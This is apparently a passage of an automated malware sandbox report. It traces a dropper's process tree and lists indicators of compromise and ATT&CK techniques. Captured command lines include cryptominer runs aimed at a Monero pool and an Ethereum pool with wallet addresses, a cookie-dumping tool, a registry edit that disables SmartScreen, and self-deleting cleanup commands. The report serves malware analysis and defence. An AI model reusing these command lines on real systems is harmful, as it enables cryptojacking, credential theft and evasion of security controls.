5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp
5704	vpn.tmp

Suspicious use of SetWindowsHookEx 28 IoCs

Processes:

MicrosoftEdge.exe804C.exe8484.exesetups.exesetups.tmpMicrosoftEdge.execpyrix.exevict.exeSetup3310.exeSetup3310.tmpvict.tmpwin1host.exetaskkill.exeSetup.exeMaskVPNUpdate.exesetups.exesetups.tmpMicrosoftEdge.exeMicrosoftEdgeCP.execpyrix.exevict.exeSetup3310.exevict.tmpSetup3310.tmpwin1host.exe

pid	process
2276	MicrosoftEdge.exe
5560
5560
4964	804C.exe
7928	8484.exe
7888	setups.exe
4628	setups.tmp
4756	MicrosoftEdge.exe
5144	cpyrix.exe
4792	vict.exe
6436	Setup3310.exe
6508	Setup3310.tmp
4676	vict.tmp
8156	win1host.exe
4700	taskkill.exe
5304	Setup.exe
4700	taskkill.exe
8412	MaskVPNUpdate.exe
6540	setups.exe
9068	setups.tmp
6984	MicrosoftEdge.exe
8856	MicrosoftEdgeCP.exe
8796	cpyrix.exe
8716	vict.exe
5872	Setup3310.exe
6404	vict.tmp
7276	Setup3310.tmp
6584	win1host.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

29DEA0BA258723098A514297F4C4D0B7.exeLabPicV3.exelylal220.exeguihuali-game.exelylal220.tmpLabPicV3.tmphjjgaa.exe22.exeWScript.exerundll32.exesvchost.exeThree.exe

description	pid	process	target process
PID 1152 wrote to memory of 2736	1152	29DEA0BA258723098A514297F4C4D0B7.exe	hjjgaa.exe
PID 1152 wrote to memory of 2736	1152	29DEA0BA258723098A514297F4C4D0B7.exe	hjjgaa.exe
PID 1152 wrote to memory of 2736	1152	29DEA0BA258723098A514297F4C4D0B7.exe	hjjgaa.exe
PID 1152 wrote to memory of 508	1152	29DEA0BA258723098A514297F4C4D0B7.exe	RunWW.exe
PID 1152 wrote to memory of 508	1152	29DEA0BA258723098A514297F4C4D0B7.exe	RunWW.exe
PID 1152 wrote to memory of 508	1152	29DEA0BA258723098A514297F4C4D0B7.exe	RunWW.exe
PID 1152 wrote to memory of 3836	1152	29DEA0BA258723098A514297F4C4D0B7.exe	jg7_7wjg.exe
PID 1152 wrote to memory of 3836	1152	29DEA0BA258723098A514297F4C4D0B7.exe	jg7_7wjg.exe
PID 1152 wrote to memory of 3836	1152	29DEA0BA258723098A514297F4C4D0B7.exe	jg7_7wjg.exe
PID 1152 wrote to memory of 3096	1152	29DEA0BA258723098A514297F4C4D0B7.exe	LabPicV3.exe
PID 1152 wrote to memory of 3096	1152	29DEA0BA258723098A514297F4C4D0B7.exe	LabPicV3.exe
PID 1152 wrote to memory of 3096	1152	29DEA0BA258723098A514297F4C4D0B7.exe	LabPicV3.exe
PID 1152 wrote to memory of 696	1152	29DEA0BA258723098A514297F4C4D0B7.exe	lylal220.exe
PID 1152 wrote to memory of 696	1152	29DEA0BA258723098A514297F4C4D0B7.exe	lylal220.exe
PID 1152 wrote to memory of 696	1152	29DEA0BA258723098A514297F4C4D0B7.exe	lylal220.exe
PID 1152 wrote to memory of 2640	1152	29DEA0BA258723098A514297F4C4D0B7.exe	22.exe
PID 1152 wrote to memory of 2640	1152	29DEA0BA258723098A514297F4C4D0B7.exe	22.exe
PID 1152 wrote to memory of 2640	1152	29DEA0BA258723098A514297F4C4D0B7.exe	22.exe
PID 1152 wrote to memory of 184	1152	29DEA0BA258723098A514297F4C4D0B7.exe	guihuali-game.exe
PID 1152 wrote to memory of 184	1152	29DEA0BA258723098A514297F4C4D0B7.exe	guihuali-game.exe
PID 1152 wrote to memory of 184	1152	29DEA0BA258723098A514297F4C4D0B7.exe	guihuali-game.exe
PID 1152 wrote to memory of 2976	1152	29DEA0BA258723098A514297F4C4D0B7.exe	HookSetp.exe
PID 1152 wrote to memory of 2976	1152	29DEA0BA258723098A514297F4C4D0B7.exe	HookSetp.exe
PID 1152 wrote to memory of 3200	1152	29DEA0BA258723098A514297F4C4D0B7.exe	Three.exe
PID 1152 wrote to memory of 3200	1152	29DEA0BA258723098A514297F4C4D0B7.exe	Three.exe
PID 3096 wrote to memory of 1292	3096	LabPicV3.exe	LabPicV3.tmp
PID 3096 wrote to memory of 1292	3096	LabPicV3.exe	LabPicV3.tmp
PID 3096 wrote to memory of 1292	3096	LabPicV3.exe	LabPicV3.tmp
PID 1152 wrote to memory of 2648	1152	29DEA0BA258723098A514297F4C4D0B7.exe	lilalmix.exe
PID 1152 wrote to memory of 2648	1152	29DEA0BA258723098A514297F4C4D0B7.exe	lilalmix.exe
PID 1152 wrote to memory of 2648	1152	29DEA0BA258723098A514297F4C4D0B7.exe	lilalmix.exe
PID 696 wrote to memory of 804	696	lylal220.exe	lylal220.tmp
PID 696 wrote to memory of 804	696	lylal220.exe	lylal220.tmp
PID 696 wrote to memory of 804	696	lylal220.exe	lylal220.tmp
PID 1152 wrote to memory of 740	1152	29DEA0BA258723098A514297F4C4D0B7.exe	loli.exe
PID 1152 wrote to memory of 740	1152	29DEA0BA258723098A514297F4C4D0B7.exe	loli.exe
PID 1152 wrote to memory of 740	1152	29DEA0BA258723098A514297F4C4D0B7.exe	loli.exe
PID 184 wrote to memory of 4148	184	guihuali-game.exe	WScript.exe
PID 184 wrote to memory of 4148	184	guihuali-game.exe	WScript.exe
PID 184 wrote to memory of 4148	184	guihuali-game.exe	WScript.exe
PID 804 wrote to memory of 4220	804	lylal220.tmp	Microsoft.exe
PID 804 wrote to memory of 4220	804	lylal220.tmp	Microsoft.exe
PID 1292 wrote to memory of 4248	1292	LabPicV3.tmp	ppppppfy.exe
PID 1292 wrote to memory of 4248	1292	LabPicV3.tmp	ppppppfy.exe
PID 2736 wrote to memory of 4388	2736	hjjgaa.exe	jfiag3g_gg.exe
PID 2736 wrote to memory of 4388	2736	hjjgaa.exe	jfiag3g_gg.exe
PID 2736 wrote to memory of 4388	2736	hjjgaa.exe	jfiag3g_gg.exe
PID 2640 wrote to memory of 4516	2640	22.exe	WScript.exe
PID 2640 wrote to memory of 4516	2640	22.exe	WScript.exe
PID 2640 wrote to memory of 4516	2640	22.exe	WScript.exe
PID 4148 wrote to memory of 4672	4148	WScript.exe	rundll32.exe
PID 4148 wrote to memory of 4672	4148	WScript.exe	rundll32.exe
PID 4148 wrote to memory of 4672	4148	WScript.exe	rundll32.exe
PID 4672 wrote to memory of 3632	4672	rundll32.exe	svchost.exe
PID 3632 wrote to memory of 4780	3632	svchost.exe	svchost.exe
PID 3632 wrote to memory of 4780	3632	svchost.exe	svchost.exe
PID 4672 wrote to memory of 2592	4672	rundll32.exe	svchost.exe
PID 3632 wrote to memory of 4780	3632	svchost.exe	svchost.exe
PID 4672 wrote to memory of 60	4672	rundll32.exe	svchost.exe
PID 4672 wrote to memory of 2388	4672	rundll32.exe	svchost.exe
PID 3200 wrote to memory of 4928	3200	Three.exe	multitimer.exe
PID 3200 wrote to memory of 4928	3200	Three.exe	multitimer.exe
PID 4672 wrote to memory of 2420	4672	rundll32.exe	svchost.exe
PID 3200 wrote to memory of 5020	3200	Three.exe	setups.exe

System policy modification 1 TTPs 1 IoCs
evasion

Modify Registry
T1112

Processes:

lilalmix.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSmartScreen = "0" lilalmix.exe
Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

6712 attrib.exe
7272 attrib.exe
4888 attrib.exe
6468 attrib.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSmartScreen = "0"	lilalmix.exe

pid	process
6712	attrib.exe
7272	attrib.exe
4888	attrib.exe
6468	attrib.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1040

C:\Users\Admin\AppData\Roaming\iccbrht
C:\Users\Admin\AppData\Roaming\iccbrht
2⤵
PID:8460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1168

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2704

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2684

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2388

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1840

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1304

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
- Modifies registry class
PID:1116

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:60

C:\Users\Admin\AppData\Local\Temp\29DEA0BA258723098A514297F4C4D0B7.exe
"C:\Users\Admin\AppData\Local\Temp\29DEA0BA258723098A514297F4C4D0B7.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1152

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2736

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:4388

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:504

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 948
3⤵
- Program crash
- Drops file in Windows directory
PID:4424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 932
3⤵
- Program crash
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1084
3⤵
- Program crash
PID:7988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1132
3⤵
- Program crash
PID:7692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1180
3⤵
- Program crash
PID:7596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1280
3⤵
- Program crash
PID:2840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1328
3⤵
- Program crash
PID:5720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 1424
3⤵
- Program crash
PID:4820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 124
3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5888

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:3836

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3096

C:\Users\Admin\AppData\Local\Temp\is-1UEL3.tmp\LabPicV3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1UEL3.tmp\LabPicV3.tmp" /SL5="$1020A,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1292

C:\Users\Admin\AppData\Local\Temp\is-NP6IU.tmp\ppppppfy.exe
"C:\Users\Admin\AppData\Local\Temp\is-NP6IU.tmp\ppppppfy.exe" /S /UID=lab214
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4248

C:\Program Files\Google\MLDIETHYOD\prolab.exe
"C:\Program Files\Google\MLDIETHYOD\prolab.exe" /VERYSILENT
5⤵
- Executes dropped EXE
PID:3420

C:\Users\Admin\AppData\Local\Temp\is-OQ75A.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OQ75A.tmp\prolab.tmp" /SL5="$80050,575243,216576,C:\Program Files\Google\MLDIETHYOD\prolab.exe" /VERYSILENT
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4264

C:\Users\Admin\AppData\Local\Temp\93-003f0-9f3-969b7-e49350366d6a2\Fuwivodaepi.exe
"C:\Users\Admin\AppData\Local\Temp\93-003f0-9f3-969b7-e49350366d6a2\Fuwivodaepi.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:3412

C:\Users\Admin\AppData\Local\Temp\57-212c3-aee-e13bf-a1a1ee95cb682\Getupycore.exe
"C:\Users\Admin\AppData\Local\Temp\57-212c3-aee-e13bf-a1a1ee95cb682\Getupycore.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ft05tdz2.tox\md6_6ydj.exe & exit
6⤵
PID:676

C:\Users\Admin\AppData\Local\Temp\ft05tdz2.tox\md6_6ydj.exe
C:\Users\Admin\AppData\Local\Temp\ft05tdz2.tox\md6_6ydj.exe
7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:5416

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxc2pdp2.cp0\askinstall31.exe & exit
6⤵
PID:5220

C:\Users\Admin\AppData\Local\Temp\fxc2pdp2.cp0\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\fxc2pdp2.cp0\askinstall31.exe
7⤵
- Executes dropped EXE
PID:5724

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
8⤵
PID:6180

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
9⤵
- Kills process with taskkill
PID:1772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xsyy4ifr.pm4\toolspab1.exe & exit
6⤵
PID:5496

C:\Users\Admin\AppData\Local\Temp\xsyy4ifr.pm4\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\xsyy4ifr.pm4\toolspab1.exe
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6132

C:\Users\Admin\AppData\Local\Temp\xsyy4ifr.pm4\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\xsyy4ifr.pm4\toolspab1.exe
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5296

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lt5ghxyh.5qy\GcleanerWW.exe /mixone & exit
6⤵
PID:5864

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d0ujfwle.bnq\setup_10.2_mix.exe & exit
6⤵
PID:4900

C:\Users\Admin\AppData\Local\Temp\d0ujfwle.bnq\setup_10.2_mix.exe
C:\Users\Admin\AppData\Local\Temp\d0ujfwle.bnq\setup_10.2_mix.exe
7⤵
- Drops file in Program Files directory
PID:7784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b0i3llui.auq\file.exe & exit
6⤵
PID:7944

C:\Users\Admin\AppData\Local\Temp\b0i3llui.auq\file.exe
C:\Users\Admin\AppData\Local\Temp\b0i3llui.auq\file.exe
7⤵
PID:8048

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
8⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\X2NSOCC3B4\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\X2NSOCC3B4\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
9⤵
PID:5516

C:\Users\Admin\AppData\Local\Temp\X2NSOCC3B4\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\X2NSOCC3B4\multitimer.exe" 1 3.1617574122.606a38eaa4b7a 101
10⤵
- Adds Run key to start application
PID:7968

C:\Users\Admin\AppData\Local\Temp\X2NSOCC3B4\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\X2NSOCC3B4\multitimer.exe" 2 3.1617574122.606a38eaa4b7a
11⤵
- Checks for any installed AV software in registry
PID:4868

C:\Users\Admin\AppData\Local\Temp\101wqmsb33i\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\101wqmsb33i\cpyrix.exe" /VERYSILENT
12⤵
- Suspicious use of SetWindowsHookEx
PID:5144

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
13⤵
- Suspicious use of SetThreadContext
PID:5396

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
14⤵
PID:9080

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
14⤵
PID:8784

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
14⤵
PID:5224

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
13⤵
- Suspicious use of SetThreadContext
PID:4728

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
14⤵
PID:6628

C:\Users\Admin\AppData\Local\Temp\pptxykgakcb\vict.exe
"C:\Users\Admin\AppData\Local\Temp\pptxykgakcb\vict.exe" /VERYSILENT /id=535
12⤵
- Suspicious use of SetWindowsHookEx
PID:4792

C:\Users\Admin\AppData\Local\Temp\is-7CK48.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7CK48.tmp\vict.tmp" /SL5="$70174,870426,780800,C:\Users\Admin\AppData\Local\Temp\pptxykgakcb\vict.exe" /VERYSILENT /id=535
13⤵
- Suspicious use of SetWindowsHookEx
PID:4676

C:\Users\Admin\AppData\Local\Temp\is-IL6KA.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-IL6KA.tmp\win1host.exe" 535
14⤵
- Suspicious use of SetWindowsHookEx
PID:8156

C:\Users\Admin\AppData\Local\Temp\gnnvvtzkv4t\app.exe
"C:\Users\Admin\AppData\Local\Temp\gnnvvtzkv4t\app.exe" /8-23
12⤵
PID:208

C:\Users\Admin\AppData\Local\Temp\gnnvvtzkv4t\app.exe
"C:\Users\Admin\AppData\Local\Temp\gnnvvtzkv4t\app.exe" /8-23
13⤵
PID:9944

C:\Users\Admin\AppData\Local\Temp\dy5nhpkfyjx\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\dy5nhpkfyjx\Setup3310.exe" /Verysilent /subid=577
12⤵
- Suspicious use of SetWindowsHookEx
PID:6436

C:\Users\Admin\AppData\Local\Temp\is-219OV.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-219OV.tmp\Setup3310.tmp" /SL5="$5039A,138429,56832,C:\Users\Admin\AppData\Local\Temp\dy5nhpkfyjx\Setup3310.exe" /Verysilent /subid=577
13⤵
- Suspicious use of SetWindowsHookEx
PID:6508

C:\Users\Admin\AppData\Local\Temp\is-6BSA7.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-6BSA7.tmp\Setup.exe" /Verysilent
14⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5304

C:\Users\Admin\AppData\Local\Temp\tq4ocojcarw\qxzp3bsfdch.exe
"C:\Users\Admin\AppData\Local\Temp\tq4ocojcarw\qxzp3bsfdch.exe" /ustwo INSTALL
12⤵
PID:1428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "qxzp3bsfdch.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\tq4ocojcarw\qxzp3bsfdch.exe" & exit
13⤵
PID:8616

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "qxzp3bsfdch.exe" /f
14⤵
- Kills process with taskkill
PID:9020

C:\Users\Admin\AppData\Local\Temp\7SJJ9EQMVC\setups.exe
"C:\Users\Admin\AppData\Local\Temp\7SJJ9EQMVC\setups.exe" ll
9⤵
- Suspicious use of SetWindowsHookEx
PID:7888

C:\Users\Admin\AppData\Local\Temp\is-MEGAD.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MEGAD.tmp\setups.tmp" /SL5="$705A0,454998,229376,C:\Users\Admin\AppData\Local\Temp\7SJJ9EQMVC\setups.exe" ll
10⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4628

C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"
8⤵
PID:4088

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:8080

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:5976

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Full Program Features.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Full Program Features.exe"
8⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
PID:5620

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
9⤵
PID:7768

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
10⤵
- Loads dropped DLL
PID:1052

C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
8⤵
- Modifies data under HKEY_USERS
PID:7440

C:\Users\Admin\AppData\Roaming\F1C3.tmp.exe
"C:\Users\Admin\AppData\Roaming\F1C3.tmp.exe"
9⤵
PID:4100

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w15930 --cpu-max-threads-hint 50 -r 9999
10⤵
- Blocklisted process makes network request
PID:7720

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w1573@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
10⤵
PID:7184

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
PID:5864

C:\Users\Admin\AppData\Roaming\FD8C.tmp.exe
"C:\Users\Admin\AppData\Roaming\FD8C.tmp.exe"
9⤵
PID:7388

C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\FD8C.tmp.exe
10⤵
PID:6248

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
11⤵
- Delays execution with timeout.exe
PID:4432

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
9⤵
PID:2084

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
10⤵
- Runs ping.exe
PID:6456

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"
8⤵
PID:3148

C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"
8⤵
PID:9700

C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe"
8⤵
PID:9648

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
9⤵
PID:2836

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
9⤵
PID:4644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v5slvl3y.na5\app.exe /8-2222 & exit
6⤵
PID:4372

C:\Users\Admin\AppData\Local\Temp\v5slvl3y.na5\app.exe
C:\Users\Admin\AppData\Local\Temp\v5slvl3y.na5\app.exe /8-2222
7⤵
PID:1580

C:\Users\Admin\AppData\Local\Temp\v5slvl3y.na5\app.exe
"C:\Users\Admin\AppData\Local\Temp\v5slvl3y.na5\app.exe" /8-2222
8⤵
PID:9492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vv2zmfke.rmk\Four.exe & exit
6⤵
PID:8808

C:\Users\Admin\AppData\Local\Temp\vv2zmfke.rmk\Four.exe
C:\Users\Admin\AppData\Local\Temp\vv2zmfke.rmk\Four.exe
7⤵
PID:8600

C:\Users\Admin\AppData\Local\Temp\6GMXAJKZY0\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\6GMXAJKZY0\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
8⤵
- Drops file in Windows directory
PID:8868

C:\Users\Admin\AppData\Local\Temp\6GMXAJKZY0\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\6GMXAJKZY0\multitimer.exe" 1 3.1617574195.606a3933ba78a 104
9⤵
- Adds Run key to start application
PID:1312

C:\Users\Admin\AppData\Local\Temp\6GMXAJKZY0\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\6GMXAJKZY0\multitimer.exe" 2 3.1617574195.606a3933ba78a
10⤵
- Checks for any installed AV software in registry
PID:6780

C:\Users\Admin\AppData\Local\Temp\my2agerx3gz\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\my2agerx3gz\Setup3310.exe" /Verysilent /subid=577
11⤵
PID:7228

C:\Users\Admin\AppData\Local\Temp\is-JQGJH.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JQGJH.tmp\Setup3310.tmp" /SL5="$60476,138429,56832,C:\Users\Admin\AppData\Local\Temp\my2agerx3gz\Setup3310.exe" /Verysilent /subid=577
12⤵
PID:8808

C:\Users\Admin\AppData\Local\Temp\is-SDNTU.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-SDNTU.tmp\Setup.exe" /Verysilent
13⤵
- Drops file in Program Files directory
PID:4988

C:\Users\Admin\AppData\Local\Temp\0hqdwc5y1kq\app.exe
"C:\Users\Admin\AppData\Local\Temp\0hqdwc5y1kq\app.exe" /8-23
11⤵
PID:2204

C:\Users\Admin\AppData\Local\Temp\0hqdwc5y1kq\app.exe
"C:\Users\Admin\AppData\Local\Temp\0hqdwc5y1kq\app.exe" /8-23
12⤵
PID:4908

C:\Users\Admin\AppData\Local\Temp\dz1cxxiyq44\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\dz1cxxiyq44\cpyrix.exe" /VERYSILENT
11⤵
PID:6716

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
12⤵
PID:3024

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
13⤵
PID:8132

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
13⤵
PID:8484

